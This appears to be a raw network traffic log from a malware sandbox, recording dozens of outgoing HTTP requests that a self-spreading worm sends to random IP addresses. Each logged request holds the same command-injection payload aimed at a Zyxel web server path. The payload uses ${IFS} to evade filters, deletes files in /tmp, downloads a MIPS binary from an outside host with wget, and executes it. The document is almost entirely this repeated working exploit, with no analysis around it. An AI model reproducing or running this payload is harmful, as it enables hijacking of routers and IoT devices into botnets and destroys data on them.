                                        Mar 31, 2024 09:20:36.298470020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1365192.168.2.2348224163.82.154.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298527956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1366192.168.2.2333824128.232.115.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298552036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1367192.168.2.233745453.161.29.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298614025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1368192.168.2.2338324142.218.79.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298655033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1369192.168.2.234521678.7.72.190443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298717022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1370192.168.2.2334406143.62.126.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298753977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1371192.168.2.235142495.192.165.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298801899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1372192.168.2.2346328190.180.232.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298835993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1373192.168.2.2344310220.38.231.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298862934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1374192.168.2.233378462.135.120.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298917055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1375192.168.2.2337896209.127.245.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.298958063 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1376192.168.2.2350914195.91.194.55443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299001932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1377192.168.2.234422039.87.186.17443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299040079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1378192.168.2.23343745.154.2.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299081087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1379192.168.2.233409869.220.62.68443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299118042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1380192.168.2.234452480.229.156.98443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299163103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1381192.168.2.234302684.144.95.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299220085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1382192.168.2.2349420217.64.170.26443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299267054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1383192.168.2.2342410109.92.8.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299309015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1384192.168.2.2354270219.249.202.18443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299349070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1385192.168.2.2356176102.33.203.141443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299385071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1386192.168.2.2337868207.127.64.149443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299443960 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1387192.168.2.2360966211.18.129.78443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299473047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1388192.168.2.2359858101.13.193.2443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299525976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1389192.168.2.2351574169.88.47.130443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299566031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1390192.168.2.2341190116.118.167.39443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299593925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1391192.168.2.235826619.78.203.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299637079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1392192.168.2.2344644192.224.10.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299690962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1393192.168.2.2352376163.237.185.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299750090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1394192.168.2.2349226110.225.170.95443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299806118 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1395192.168.2.235833257.59.204.112443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299845934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1396192.168.2.2344078203.200.131.116443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299890995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1397192.168.2.234199881.137.32.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299933910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1398192.168.2.2350374186.180.183.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.299971104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1399192.168.2.234361269.253.251.187443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300039053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1400192.168.2.2338982132.139.69.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300071955 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1401192.168.2.2352672107.162.47.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300113916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1402192.168.2.234663472.248.124.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300163984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1403192.168.2.234469499.178.11.152443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300195932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1404192.168.2.23486969.209.45.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300245047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1405192.168.2.233802898.111.243.127443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300276041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1406192.168.2.235872820.162.98.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.300333977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1407192.168.2.235819881.115.218.210443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307744980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1408192.168.2.2347240201.113.178.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307771921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1409192.168.2.234480432.236.17.203443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307815075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1410192.168.2.2338030105.139.226.216443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307862997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1411192.168.2.2347854189.49.235.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307907104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1412192.168.2.2358496138.230.115.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307943106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1413192.168.2.2360072164.204.122.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.307990074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1414192.168.2.236056238.82.19.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308022976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1415192.168.2.2353398116.180.81.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308059931 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1416192.168.2.2334430122.118.157.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308116913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1417192.168.2.2339628188.84.145.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308144093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1418192.168.2.2348680148.242.37.48443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308186054 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1419192.168.2.2358768125.145.174.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308234930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1420192.168.2.2351430210.157.118.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308273077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1421192.168.2.233761691.151.75.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308309078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1422192.168.2.2351834181.199.94.202443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308341026 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1423192.168.2.2357844166.210.184.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308372974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1424192.168.2.2347294149.163.182.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308420897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1425192.168.2.2335256151.240.115.32443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308458090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1426192.168.2.2352414182.82.71.53443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308495998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1427192.168.2.2353320104.150.213.6443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308521032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1428192.168.2.23537201.71.77.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308558941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1429192.168.2.2350576149.205.132.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308614016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1430192.168.2.235288620.70.241.70443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308653116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1431192.168.2.2358574137.27.143.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:36.308687925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1432192.168.2.2354044101.4.27.149443
                                        TimestampBytes transferredDirectionData
